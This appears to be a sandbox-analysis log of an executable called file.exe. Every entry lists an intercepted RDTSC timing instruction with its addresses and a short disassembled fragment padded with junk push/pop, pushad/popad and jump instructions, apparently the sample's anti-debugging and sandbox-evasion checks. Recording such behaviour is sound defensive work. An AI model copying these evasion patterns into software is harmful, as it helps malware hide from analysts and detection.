Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5766B8 second address: 5766BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57680A second address: 576811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576811 second address: 576820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F075CBABEC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B31 second address: 576B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B45 second address: 576B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B4B second address: 576B73 instructions: 0x00000000 rdtsc 0x00000002 js 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d js 00007F075D128F07h 0x00000013 jmp 00007F075D128EFBh 0x00000018 jp 00007F075D128EF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B73 second address: 576B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578D0E second address: 578D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578D14 second address: 578D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jp 00007F075CBABEDEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578EB5 second address: 578EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F075D128EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57C23E second address: 57C246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57C246 second address: 57C24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57C24A second address: 57C259 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BAD3 second address: 57BAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128EFFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BAE7 second address: 57BB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F075CBABED4h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BC7C second address: 57BC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BF56 second address: 57BF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jno 00007F075CBABECCh 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F075CBABED3h 0x00000014 js 00007F075CBABEC6h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5810C2 second address: 5810CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F075D128EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581229 second address: 58123D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F075CBABEC6h 0x00000008 jno 00007F075CBABEC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58123D second address: 581241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813C2 second address: 5813CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F075CBABEC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813CE second address: 5813EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F04h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813EB second address: 5813EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813EF second address: 5813F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581828 second address: 58184C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F075CBABEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F075CBABED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58184C second address: 58185E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F075D128EFCh 0x00000008 jbe 00007F075D128EF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 589050 second address: 58905B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F075CBABEC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 589200 second address: 58921E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F075D128F04h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E57A second address: 52E57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5894F7 second address: 5894FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5894FB second address: 589527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F075CBABED3h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 589527 second address: 58952B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58952B second address: 58954E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F075CBABEC6h 0x00000008 js 00007F075CBABEC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007F075CBABECCh 0x00000018 pop ebx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58954E second address: 589554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C8FE second address: 58C904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C904 second address: 58C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C90C second address: 58C912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58CA59 second address: 58CA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58CE64 second address: 58CE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F075CBABEC6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59520C second address: 595219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F075D128EF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593395 second address: 593399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593AAF second address: 593AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593AB5 second address: 593ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593ABC second address: 593ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F075D128EFDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593ADB second address: 593AFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F075CBABEC6h 0x00000008 jmp 00007F075CBABECAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F075CBABEDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593AFB second address: 593B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F03h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593E14 second address: 593E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F075CBABEC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59410D second address: 594111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5943D3 second address: 5943F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F075CBABED2h 0x00000008 jnl 00007F075CBABEC6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5943F5 second address: 5943F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59D22E second address: 59D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A224A second address: 5A224E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A224E second address: 5A2259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2259 second address: 5A2269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F075D128EF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2269 second address: 5A228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F075CBABECEh 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F075CBABECCh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A8467 second address: 5A846D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A85D6 second address: 5A85DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A85DA second address: 5A85E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A85E0 second address: 5A85E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A8CF2 second address: 5A8D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFEh 0x00000007 jmp 00007F075D128EFCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A95D6 second address: 5A9601 instructions: 0x00000000 rdtsc 0x00000002 je 00007F075CBABECCh 0x00000008 pushad 0x00000009 jmp 00007F075CBABECFh 0x0000000e jmp 00007F075CBABECBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A7B6F second address: 5A7B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F075D128EF6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AFA7D second address: 5AFAAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F075CBABEC6h 0x00000012 jmp 00007F075CBABED5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AFAAA second address: 5AFAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF662 second address: 5AF668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF668 second address: 5AF66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BD420 second address: 5BD424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BCE68 second address: 5BCE82 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075D128EFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C178D second address: 5C1791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E03DD second address: 4E03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E03E3 second address: 4E03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F075CBABEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C12D6 second address: 5C12DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C12DD second address: 5C12E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C12E3 second address: 5C1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F075D128F04h 0x0000000c popad 0x0000000d jc 00007F075D128F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C1309 second address: 5C130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF541 second address: 5CF558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075D128F02h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF558 second address: 5CF560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF560 second address: 5CF566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D52A4 second address: 5D52BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABED6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D52BE second address: 5D52E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 push esi 0x00000008 jmp 00007F075D128EFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DAC83 second address: 5DAC87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D95AB second address: 5D95B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D98A3 second address: 5D98A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9A28 second address: 5D9A62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F075D128F07h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F075D128EF6h 0x00000013 jmp 00007F075D128F05h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9D21 second address: 5D9D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9FE5 second address: 5D9FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0BCF second address: 5E0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0868 second address: 5E086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E086C second address: 5E0872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED795 second address: 5ED7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F075D128EF6h 0x0000000a pop edx 0x0000000b jmp 00007F075D128F05h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7B5 second address: 5ED7D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F075CBABEC6h 0x0000000a jmp 00007F075CBABED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7D5 second address: 5ED7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7D9 second address: 5ED7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7DF second address: 5ED7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ED7E8 second address: 5ED7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F393E second address: 5F3944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F37F7 second address: 5F37FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F37FD second address: 5F3809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F075D128EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3809 second address: 5F380D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBFAE second address: 5EBFBD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F075D128EF6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBFBD second address: 5EBFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FFF38 second address: 5FFF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FFF3D second address: 5FFF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F075CBABECCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6020CA second address: 60211D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F075D128F09h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F075D128F07h 0x00000016 jmp 00007F075D128F05h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60211D second address: 602122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602122 second address: 60212B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B687 second address: 61B68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
